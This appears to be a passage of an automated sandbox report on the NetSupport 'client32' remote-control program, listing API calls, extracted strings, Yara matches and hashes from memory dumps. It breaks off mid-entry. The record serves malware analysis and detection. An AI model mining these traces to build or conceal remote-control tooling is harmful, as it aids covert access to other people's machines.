                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: wsprintf$CountErrorLastMessageTick$DebugOutputString_strrchr$CurrentDispatchReadStateThreadTranslate
                                                                                                                                                                • String ID: Exception caught at %x. Trying minidump.
                                                                                                                                                                • API String ID: 490122820-543155386
                                                                                                                                                                • Opcode ID: 2fc6aae1165e1eadac81f9b3d3da5e414a6db5acb2d45d699591467b478390dd
                                                                                                                                                                • Instruction ID: eed67cde3fb75ca7c288633e1f9c4b1d03945ae1a33bfc43050b2d2fe3e6b1e4
                                                                                                                                                                • Opcode Fuzzy Hash: 2fc6aae1165e1eadac81f9b3d3da5e414a6db5acb2d45d699591467b478390dd
                                                                                                                                                                • Instruction Fuzzy Hash: 4C21D675D04218ABD715DB64DCC5FE9F7B8AB5C709F0044A4E61597280EBB06E84CBA0
                                                                                                                                                                APIs
                                                                                                                                                                • FindResourceA.KERNEL32(00000000,00001770,0000000A), ref: 1108918F
                                                                                                                                                                • LoadResource.KERNEL32(00000000,00000000,?,00000000,?,110CEF56,?), ref: 110891A4
                                                                                                                                                                • LockResource.KERNEL32(00000000,?,00000000,?,110CEF56,?), ref: 110891D6
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Resource$FindLoadLock
                                                                                                                                                                • String ID: ..\ctl32\Errorhan.cpp$hMap
                                                                                                                                                                • API String ID: 2752051264-327499879
                                                                                                                                                                APIs
                                                                                                                                                                • GetProcAddress.KERNEL32(11074E10,ctl_version), ref: 11063177
                                                                                                                                                                • GetProcAddress.KERNEL32(11074E10,ctl_installed), ref: 1106319C
                                                                                                                                                                • GetProcAddress.KERNEL32(11074E10,ctl_netname), ref: 110631C2
                                                                                                                                                                • GetProcAddress.KERNEL32(11074E10,ctl_remotename), ref: 110631E8
                                                                                                                                                                • GetProcAddress.KERNEL32(11074E10,ctl_bridgename), ref: 1106320E
                                                                                                                                                                • GetProcAddress.KERNEL32(11074E10,ctl_networks), ref: 11063234
                                                                                                                                                                • GetProcAddress.KERNEL32(11074E10,ctl_pingnet), ref: 1106325A
                                                                                                                                                                • GetProcAddress.KERNEL32(11074E10,ctl_open), ref: 11063280
                                                                                                                                                                • GetProcAddress.KERNEL32(11074E10,ctl_close), ref: 110632A6
                                                                                                                                                                • GetProcAddress.KERNEL32(11074E10,ctl_getsession), ref: 110632F2
                                                                                                                                                                • GetProcAddress.KERNEL32(11074E10,ctl_call), ref: 11063318
                                                                                                                                                                • GetProcAddress.KERNEL32(11074E10,ctl_hangup), ref: 1106333E
                                                                                                                                                                • GetProcAddress.KERNEL32(11074E10,ctl_nsessions), ref: 11063364
                                                                                                                                                                • GetProcAddress.KERNEL32(11074E10,ctl_connected), ref: 1106338A
                                                                                                                                                                • GetProcAddress.KERNEL32(11074E10,ctl_send), ref: 110633B0
                                                                                                                                                                • GetProcAddress.KERNEL32(11074E10,ctl_sendex), ref: 110633D6
                                                                                                                                                                • GetProcAddress.KERNEL32(11074E10,ctl_sendif), ref: 110633EB
                                                                                                                                                                • GetProcAddress.KERNEL32(11074E10,ctl_sendto), ref: 11063411
                                                                                                                                                                • GetProcAddress.KERNEL32(11074E10,ctl_subset), ref: 1106341C
                                                                                                                                                                • GetProcAddress.KERNEL32(11074E10,ctl_helpreq), ref: 11063468
                                                                                                                                                                • GetProcAddress.KERNEL32(11074E10,ctl_maxpacket), ref: 1106348E
                                                                                                                                                                • GetProcAddress.KERNEL32(11074E10,ctl_openremote), ref: 110634B4
                                                                                                                                                                • GetProcAddress.KERNEL32(11074E10,ctl_closeremote), ref: 110634DA
                                                                                                                                                                • GetProcAddress.KERNEL32(11074E10,ctl_callremote), ref: 11063500
                                                                                                                                                                • GetProcAddress.KERNEL32(11074E10,ctl_pause), ref: 11063442
                                                                                                                                                                  • Part of subcall function 11029450: _strrchr.LIBCMT ref: 11029545
                                                                                                                                                                  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029584
                                                                                                                                                                • GetProcAddress.KERNEL32(11074E10,ctl_findslaves), ref: 110632CC
                                                                                                                                                                  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                                                                  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                                                                  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                                                                  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                                                                                • GetProcAddress.KERNEL32(11074E10,ctl_myaddr), ref: 11063526
                                                                                                                                                                • GetProcAddress.KERNEL32(11074E10,ctl_loadbridge), ref: 11063531
                                                                                                                                                                • GetProcAddress.KERNEL32(11074E10,ctl_getfailedreason), ref: 1106353C
                                                                                                                                                                • GetProcAddress.KERNEL32(11074E10,ctl_escape), ref: 11063547
                                                                                                                                                                • GetProcAddress.KERNEL32(11074E10,ctl_publishservice), ref: 11063552
                                                                                                                                                                • GetProcAddress.KERNEL32(11074E10,ctl_publishserviceex), ref: 1106355D
                                                                                                                                                                • GetProcAddress.KERNEL32(11074E10,ctl_findslavesex), ref: 1106356B
                                                                                                                                                                • GetProcAddress.KERNEL32(11074E10,ctl_broadcastdata), ref: 11063576
                                                                                                                                                                • GetProcAddress.KERNEL32(11074E10,ctl_sendname), ref: 11063584
                                                                                                                                                                • GetProcAddress.KERNEL32(11074E10,ctl_getlouserpaddressinuse), ref: 11063592
                                                                                                                                                                • GetProcAddress.KERNEL32(11074E10,ctl_clientpinrequest), ref: 110635A0
                                                                                                                                                                • GetProcAddress.KERNEL32(11074E10,ctl_controlsendpin), ref: 110635AE
                                                                                                                                                                • GetProcAddress.KERNEL32(11074E10,ctl_controlpinrequest), ref: 110635BC
                                                                                                                                                                • GetProcAddress.KERNEL32(11074E10,ctl_clearpin), ref: 110635CA
                                                                                                                                                                • GetProcAddress.KERNEL32(11074E10,ctl_getcodepage), ref: 110635D8
                                                                                                                                                                • GetProcAddress.KERNEL32(11074E10,ctl_getconnectivityinfo), ref: 110635E6
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressProc$ExitProcess$ErrorLastMessage_strrchrwsprintf
                                                                                                                                                                • String ID: ..\ctl32\Connect.cpp$ctl_bridgename$ctl_broadcastdata$ctl_call$ctl_callremote$ctl_clearpin$ctl_clientpinrequest$ctl_close$ctl_closeremote$ctl_connected$ctl_controlpinrequest$ctl_controlsendpin$ctl_escape$ctl_findslaves$ctl_findslavesex$ctl_getcodepage$ctl_getconnectivityinfo$ctl_getfailedreason$ctl_getlouserpaddressinuse$ctl_getsession$ctl_hangup$ctl_helpreq$ctl_installed$ctl_loadbridge$ctl_maxpacket$ctl_myaddr$ctl_netname$ctl_networks$ctl_nsessions$ctl_open$ctl_openremote$ctl_pause$ctl_pingnet$ctl_publishservice$ctl_publishserviceex$ctl_remotename$ctl_send$ctl_sendex$ctl_sendif$ctl_sendname$ctl_sendto$ctl_subset$ctl_version
                                                                                                                                                                • API String ID: 1096595926-1306570422
                                                                                                                                                                APIs
                                                                                                                                                                • GetDlgItem.USER32(?,?), ref: 1101D690
                                                                                                                                                                • GetWindowTextLengthA.USER32(00000000), ref: 1101D699
                                                                                                                                                                • SendMessageA.USER32(00000000,000000B1,00000001,00000001), ref: 1101D6AE
                                                                                                                                                                • _memset.LIBCMT ref: 1101D6BF
                                                                                                                                                                • SendMessageA.USER32(00000000,0000043A,00000000,?), ref: 1101D6E6
                                                                                                                                                                • SendMessageA.USER32(00000000,0000043A,00000001,?), ref: 1101D6FE
                                                                                                                                                                • SendMessageA.USER32(00000000,00000444,00000001,?), ref: 1101D760
                                                                                                                                                                • LoadBitmapA.USER32(00000000,000013CD), ref: 1101D79F
                                                                                                                                                                • GetObjectA.GDI32(00000000,00000018,?), ref: 1101D7B5
                                                                                                                                                                  • Part of subcall function 110D0710: __strdup.LIBCMT ref: 110D072A
                                                                                                                                                                  • Part of subcall function 110D07C0: _free.LIBCMT ref: 110D07ED
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: MessageSend$BitmapItemLengthLoadObjectTextWindow__strdup_free_memset
                                                                                                                                                                • String ID: Chat$DisableSmileys$IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                                • API String ID: 3923228642-2891806625
                                                                                                                                                                APIs
                                                                                                                                                                • GetLastError.KERNEL32(00000000,00000001,00000008,?,?,?,?,?), ref: 11107546
                                                                                                                                                                • GetLastError.KERNEL32(?,?,?), ref: 1110755A
                                                                                                                                                                • GetTickCount.KERNEL32 ref: 11107588
                                                                                                                                                                • SetThreadPriority.KERNEL32(00000000,00000001,110FE000,00000001,00000000,00000000,00000001,00000008,?,?,?,?,?), ref: 1110760E
                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?), ref: 11107615
                                                                                                                                                                • InterlockedExchange.KERNEL32(00000000,00000000), ref: 11107627
                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,00001388,?,?,?), ref: 11107639
                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?), ref: 11107659
                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000207,00000000,00000001,00000008,?,?,?,?,?), ref: 11107679
                                                                                                                                                                • wsprintfA.USER32 ref: 111076A5
                                                                                                                                                                • SetTokenInformation.ADVAPI32(00000000,0000000C,?,00000004), ref: 111077F8
                                                                                                                                                                • GetLastError.KERNEL32 ref: 11107802
                                                                                                                                                                • _memset.LIBCMT ref: 11107825
                                                                                                                                                                • GetCurrentProcess.KERNEL32(?), ref: 11107848
                                                                                                                                                                • GetPriorityClass.KERNEL32(00000000), ref: 1110784F
                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 11107883
                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 111078A4
                                                                                                                                                                • GetTickCount.KERNEL32 ref: 11107932
                                                                                                                                                                Strings
                                                                                                                                                                • /TS , xrefs: 1110773D
                                                                                                                                                                • Error. Null psi for session %d, xrefs: 111074AD
                                                                                                                                                                • Warning. Session %d disconnected - not launching client, xrefs: 111075CD
                                                                                                                                                                • Warning. WTSQuerySessionInformation(%d) failed - not launching client, e=%d, xrefs: 1110755E
                                                                                                                                                                • clientname, xrefs: 11107765
                                                                                                                                                                • /VistaUI , xrefs: 111076CC
                                                                                                                                                                • Error. settok(%x, seshid %d) ret %d, e=%d, xrefs: 1110780D
                                                                                                                                                                • D, xrefs: 11107834
                                                                                                                                                                • DisableConsoleClient, xrefs: 111076E8
                                                                                                                                                                • " %s , xrefs: 1110769F
                                                                                                                                                                • Error. terminating ui client, xrefs: 11107643
                                                                                                                                                                • Restarting client after aborted logoff., xrefs: 111074F1
                                                                                                                                                                • Error. ExecProcessAsUser ret %d, xrefs: 11107896
                                                                                                                                                                • Exec %d-%s ret %d (h=%x), xrefs: 1110790E
                                                                                                                                                                • /S , xrefs: 11107718
                                                                                                                                                                • CurrentSession %d appears invalid. Reset to -1, xrefs: 1110757B
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseHandle$ErrorLast$CountPriorityTick$ClassCurrentExchangeFileInformationInterlockedModuleNameObjectProcessSingleThreadTokenWait_memsetwsprintf
                                                                                                                                                                • String ID: " %s $/S $/TS $/VistaUI $CurrentSession %d appears invalid. Reset to -1$D$DisableConsoleClient$Error. ExecProcessAsUser ret %d$Error. Null psi for session %d$Error. settok(%x, seshid %d) ret %d, e=%d$Error. terminating ui client$Exec %d-%s ret %d (h=%x)$Restarting client after aborted logoff.$Warning. Session %d disconnected - not launching client$Warning. WTSQuerySessionInformation(%d) failed - not launching client, e=%d$clientname
                                                                                                                                                                • API String ID: 161374856-1113802814
                                                                                                                                                                • Opcode ID: c58d180b3558540ad75e579067b834d4c43180a98eb3a7bdf316f64922136371
                                                                                                                                                                • Instruction ID: 91aea3661803dec28b3ae4f48bb2d9f520ca8aa3a68452e91682b0156efcc083
                                                                                                                                                                • Opcode Fuzzy Hash: c58d180b3558540ad75e579067b834d4c43180a98eb3a7bdf316f64922136371
                                                                                                                                                                • Instruction Fuzzy Hash: 2FE11774D0065A9FEB11DF64CD88FAAFBB4EF44308F1082A9E95997280EB719944CF91
                                                                                                                                                                APIs
                                                                                                                                                                • Sleep.KERNEL32(?,59FD48C0,00000000,?,?), ref: 1106F716
                                                                                                                                                                • EnterCriticalSection.KERNEL32(?,59FD48C0,00000000,?,?), ref: 1106F729
                                                                                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 1106F72C
                                                                                                                                                                • EnterCriticalSection.KERNEL32(?), ref: 1106F739
                                                                                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 1106F73C
                                                                                                                                                                • EnterCriticalSection.KERNEL32(?), ref: 1106F746
                                                                                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 1106F749
                                                                                                                                                                • EnterCriticalSection.KERNEL32(?), ref: 1106F76A
                                                                                                                                                                • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?), ref: 1106F7B4
                                                                                                                                                                • wsprintfA.USER32 ref: 1106F800
                                                                                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 1106F889
                                                                                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 1106F898
                                                                                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 1106F8A1
                                                                                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 1106F8B9
                                                                                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 1106F8D7
                                                                                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 1106F90E
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CriticalSection$DecrementInterlocked$EnterLeave$Sleepwsprintf
                                                                                                                                                                • String ID: *slot == c$..\ctl32\Connect.cpp$DestroyThread finished, NULL lid$DestroyThread finished, cid==-1$DestroyThread finished, lwr==upr$slot %d, ppConn=%x, *ppConn=%x, c=%x
                                                                                                                                                                • API String ID: 2291750367-2321163575
                                                                                                                                                                • Opcode ID: ffc9d817b1687cccdfda9b510cf608883ebab596d38c18c87a17260cc501fcf2
                                                                                                                                                                • Instruction ID: d9920995edfa82a09cd3ff1c5cf6f1b3ec6b4d09dacc84edfcea4b061af5255a
                                                                                                                                                                • Opcode Fuzzy Hash: ffc9d817b1687cccdfda9b510cf608883ebab596d38c18c87a17260cc501fcf2
                                                                                                                                                                • Instruction Fuzzy Hash: E2D1B075E00255DFEB15CF64C894B9EB7F9BF48308F0581A9E41AA7241DB30AE41CFA1
                                                                                                                                                                APIs
                                                                                                                                                                • GetCursorInfo.USER32 ref: 110177B1
                                                                                                                                                                • GetIconInfo.USER32(?,?), ref: 110177DB
                                                                                                                                                                • GetObjectA.GDI32(?,00000018,?), ref: 11017809
                                                                                                                                                                • DeleteObject.GDI32(?), ref: 11017820
                                                                                                                                                                • DeleteObject.GDI32(?), ref: 1101782D
                                                                                                                                                                • _memset.LIBCMT ref: 11017850
                                                                                                                                                                • DeleteObject.GDI32(?), ref: 110178E0
                                                                                                                                                                • DeleteObject.GDI32(?), ref: 110178F1
                                                                                                                                                                • GetBitmapBits.GDI32(?,?,?), ref: 1101791C
                                                                                                                                                                • GetObjectA.GDI32(?,00000018,?), ref: 1101793A
                                                                                                                                                                • _malloc.LIBCMT ref: 11017987
                                                                                                                                                                • GetBitmapBits.GDI32(?,?,00000000), ref: 110179A0
                                                                                                                                                                • _free.LIBCMT ref: 11017A9F
                                                                                                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 11017AB7
                                                                                                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 11017ABD
                                                                                                                                                                • CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 11017AD5
                                                                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 11017AE3
                                                                                                                                                                • SelectObject.GDI32(00000000,?), ref: 11017AF7
                                                                                                                                                                • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 11017B20
                                                                                                                                                                • SelectObject.GDI32(00000000,?), ref: 11017B2E
                                                                                                                                                                • SelectObject.GDI32(00000000,?), ref: 11017B3C
                                                                                                                                                                • GetBitmapBits.GDI32(?,?,?), ref: 11017B6E
                                                                                                                                                                • DeleteObject.GDI32(?), ref: 11017B83
                                                                                                                                                                • DeleteDC.GDI32(00000000), ref: 11017B90
                                                                                                                                                                • DeleteDC.GDI32(00000000), ref: 11017B93
                                                                                                                                                                • _memmove.LIBCMT ref: 11017BB0
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Object$Delete$BitmapSelect$BitsCreate$CompatibleInfo$CursorIcon_free_malloc_memmove_memset
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3967744211-3916222277
                                                                                                                                                                • Opcode ID: 3d62f99c9ce37d9aef3ff397a9b8879e606c38d97d0a624de454d77c33408b6f
                                                                                                                                                                • Instruction ID: 51def0c358fc3afc124783ed49e37ab26e03e79d5813580ccbe663cd6c259546
                                                                                                                                                                • Opcode Fuzzy Hash: 3d62f99c9ce37d9aef3ff397a9b8879e606c38d97d0a624de454d77c33408b6f
                                                                                                                                                                • Instruction Fuzzy Hash: 9BC15371D043299BDB24CF64CC88B99B7B9EF48304F0081EAE919AB246D774EE84CF50
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                                                                                                • GetLocalTime.KERNEL32(?,_debug,CheckLeaks,00000001,00000000,59FD48C0), ref: 1113398E
                                                                                                                                                                • LoadLibraryA.KERNEL32(psapi.dll), ref: 111339E6
                                                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 11133A27
                                                                                                                                                                • GetProcAddress.KERNEL32(?,GetProcessHandleCount), ref: 11133A51
                                                                                                                                                                • SetLastError.KERNEL32(00000078), ref: 11133A68
                                                                                                                                                                • GetProcAddress.KERNEL32(?,GetGuiResources), ref: 11133A84
                                                                                                                                                                • GetProcAddress.KERNEL32(?,GetGuiResources), ref: 11133AAC
                                                                                                                                                                • SetLastError.KERNEL32(00000078), ref: 11133AC9
                                                                                                                                                                • SetLastError.KERNEL32(00000078), ref: 11133AD6
                                                                                                                                                                • GetProcAddress.KERNEL32(?,GetProcessMemoryInfo), ref: 11133AE8
                                                                                                                                                                • SetLastError.KERNEL32(00000078), ref: 11133B01
                                                                                                                                                                • FreeLibrary.KERNEL32(?), ref: 11133C6B
                                                                                                                                                                • FreeLibrary.KERNEL32(?), ref: 11133C78
                                                                                                                                                                • FreeLibrary.KERNEL32(?), ref: 11133C82
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressErrorLastLibraryProc$Free$CurrentLoadLocalProcessTime__wcstoi64
                                                                                                                                                                • String ID: CheckLeaks$Client$Date=%04d-%02d-%02d$GetGuiResources$GetProcessHandleCount$GetProcessMemoryInfo$RestartGdiObj$RestartHandles$RestartMB$RestartUserObj$Used handles=%d, gdiObj=%d, userObj=%d, mem=%u kB$_debug$psapi.dll
                                                                                                                                                                • API String ID: 591687743-1001504656
                                                                                                                                                                • Opcode ID: 87783a789c6862cb7a583f6d0127a67f1abf74d6ca2b18a0a01f6916aa137176
                                                                                                                                                                • Instruction ID: 17d7fdf42b282dadbb05295794651177f64ab9c07d211a437ec733fd2e53fcc2
                                                                                                                                                                • Opcode Fuzzy Hash: 87783a789c6862cb7a583f6d0127a67f1abf74d6ca2b18a0a01f6916aa137176
                                                                                                                                                                • Instruction Fuzzy Hash: A3B1BFB1E242699FDB10DFE9CDC0AADFBB6EB48319F10452AE414E7348DB349844CB65
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 1105DE40: __itow.LIBCMT ref: 1105DE65
                                                                                                                                                                • GetObjectA.GDI32(?,0000003C,?), ref: 11005435
                                                                                                                                                                  • Part of subcall function 1110F4A0: _malloc.LIBCMT ref: 1110F4A9
                                                                                                                                                                  • Part of subcall function 1110F4A0: _memset.LIBCMT ref: 1110F4D2
                                                                                                                                                                • wsprintfA.USER32 ref: 1100548D
                                                                                                                                                                • DeleteObject.GDI32(?), ref: 110054E2
                                                                                                                                                                • DeleteObject.GDI32(?), ref: 110054EB
                                                                                                                                                                • SelectObject.GDI32(?,?), ref: 11005502
                                                                                                                                                                • DeleteObject.GDI32(?), ref: 11005508
                                                                                                                                                                • DeleteDC.GDI32(?), ref: 1100550E
                                                                                                                                                                • SelectObject.GDI32(?,?), ref: 1100551F
                                                                                                                                                                • DeleteObject.GDI32(?), ref: 11005528
                                                                                                                                                                • DeleteDC.GDI32(?), ref: 1100552E
                                                                                                                                                                • DeleteObject.GDI32(?), ref: 1100553F
                                                                                                                                                                • DeleteObject.GDI32(?), ref: 1100556A
                                                                                                                                                                • DeleteObject.GDI32(?), ref: 11005588
                                                                                                                                                                • DeleteObject.GDI32(?), ref: 11005591
                                                                                                                                                                • ShowWindow.USER32(?,00000009), ref: 110055BF
                                                                                                                                                                • PostQuitMessage.USER32(00000000), ref: 110055C7
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Object$Delete$Select$MessagePostQuitShowWindow__itow_malloc_memsetwsprintf
                                                                                                                                                                • String ID: %d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%s$Annotate$FillColour$FillStyle$Font$PenColour$PenStyle$PenWidth$Tool
                                                                                                                                                                • API String ID: 2789700732-770455996
                                                                                                                                                                • Opcode ID: 2451f95e94c9c72552f3f2c2729a503008db99330f9048a50f9573f88d595965
                                                                                                                                                                • Instruction ID: d9229358f4933b228272336fa2bf33a0883a331572b372d30b0232039735f129
                                                                                                                                                                • Opcode Fuzzy Hash: 2451f95e94c9c72552f3f2c2729a503008db99330f9048a50f9573f88d595965
                                                                                                                                                                • Instruction Fuzzy Hash: 5C816975A00609AFD728DBB5C990EABF7F9BF8C304F00451DE6A697680DA75F801CB60
                                                                                                                                                                APIs
                                                                                                                                                                • BeginPaint.USER32(?,?), ref: 110152BF
                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 110152D7
                                                                                                                                                                • _memset.LIBCMT ref: 110152E5
                                                                                                                                                                • CreateFontIndirectA.GDI32(?), ref: 11015301
                                                                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 11015315
                                                                                                                                                                • SetBkMode.GDI32(00000000,00000001), ref: 11015320
                                                                                                                                                                • BeginPath.GDI32(00000000), ref: 1101532D
                                                                                                                                                                • TextOutA.GDI32(00000000,00000000,00000000), ref: 11015350
                                                                                                                                                                • EndPath.GDI32(00000000), ref: 11015357
                                                                                                                                                                • PathToRegion.GDI32(00000000), ref: 1101535E
                                                                                                                                                                • CreateSolidBrush.GDI32(?), ref: 11015370
                                                                                                                                                                • CreateSolidBrush.GDI32(?), ref: 11015386
                                                                                                                                                                • CreatePen.GDI32(00000000,00000002,?), ref: 110153A0
                                                                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 110153AE
                                                                                                                                                                • SelectObject.GDI32(00000000,?), ref: 110153BE
                                                                                                                                                                • GetRgnBox.GDI32(00000000,?), ref: 110153CB
                                                                                                                                                                • OffsetRgn.GDI32(00000000,?,00000000), ref: 110153EA
                                                                                                                                                                • FillRgn.GDI32(00000000,00000000,?), ref: 110153F9
                                                                                                                                                                • FrameRgn.GDI32(00000000,00000000,?,00000002,00000002), ref: 1101540C
                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 11015419
                                                                                                                                                                • SelectObject.GDI32(00000000,?), ref: 11015423
                                                                                                                                                                • SelectObject.GDI32(00000000,?), ref: 1101542D
                                                                                                                                                                • DeleteObject.GDI32(?), ref: 11015436
                                                                                                                                                                • DeleteObject.GDI32(?), ref: 1101543F
                                                                                                                                                                • DeleteObject.GDI32(?), ref: 11015448
                                                                                                                                                                • SelectObject.GDI32(00000000,?), ref: 11015452
                                                                                                                                                                • DeleteObject.GDI32(?), ref: 1101545B
                                                                                                                                                                • SetBkMode.GDI32(00000000,?), ref: 11015465
                                                                                                                                                                • EndPaint.USER32(?,?), ref: 11015479
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Object$Select$Delete$Create$Path$BeginBrushModePaintSolid$FillFontFrameIndirectOffsetRectRegionTextWindow_memset
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3702029449-0
                                                                                                                                                                • Opcode ID: 24b8a3e860cad455b09ae9666a62e4d5b44d953a1c6f38d3d180a12544eed90e
                                                                                                                                                                • Instruction ID: 652d7b9cefe541cc9f67407d7bb7a055c5a4b94d45e30f14e3a138b487ffb704
                                                                                                                                                                • Opcode Fuzzy Hash: 24b8a3e860cad455b09ae9666a62e4d5b44d953a1c6f38d3d180a12544eed90e
                                                                                                                                                                • Instruction Fuzzy Hash: 0D511875A10228AFDB14DBA4CC88FAEF7B9EF89304F004199E519D7244DB74AE44CF61
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                                                                                                  • Part of subcall function 110ED1F0: RegCreateKeyExA.ADVAPI32(00000000,0002001F,00000000,00000000,80000001,?,1105E76C,?,00000000,?,00000000,76968400,?,?,1105E76C,80000001), ref: 110ED21B
                                                                                                                                                                • GetTickCount.KERNEL32 ref: 110FF4DB
                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 110FF4E8
                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 110FF4F5
                                                                                                                                                                • GetTickCount.KERNEL32 ref: 110FF4FB
                                                                                                                                                                • wsprintfA.USER32 ref: 110FF5BE
                                                                                                                                                                • _memset.LIBCMT ref: 110FF5CF
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CountTick$CloseCreateHandleObjectSingleWait__wcstoi64_memsetwsprintf
                                                                                                                                                                • String ID: "%s" %s %s HID*$%s HID*$Client$D$DisableHIDCode$DisableHidDevices(%d)$DisabledHID$Error %d opening key$Error creating process %s$Software\NetSupport Ltd\Client32$Trace$TraceFile$Waited %d ms for last devcon$_debug$nsdevcon.exe$nsdevcon64.exe
                                                                                                                                                                • API String ID: 137837830-2801557662
                                                                                                                                                                • Opcode ID: 6bf3ca8b1897a9fb597f7e1bcf8d3474db02404c230f644f8e4e51502cd176c1
                                                                                                                                                                • Instruction ID: a11abc6b97969388e485db2e6a8e88b8a5e3b39e7edf5af597a12920a36432c8
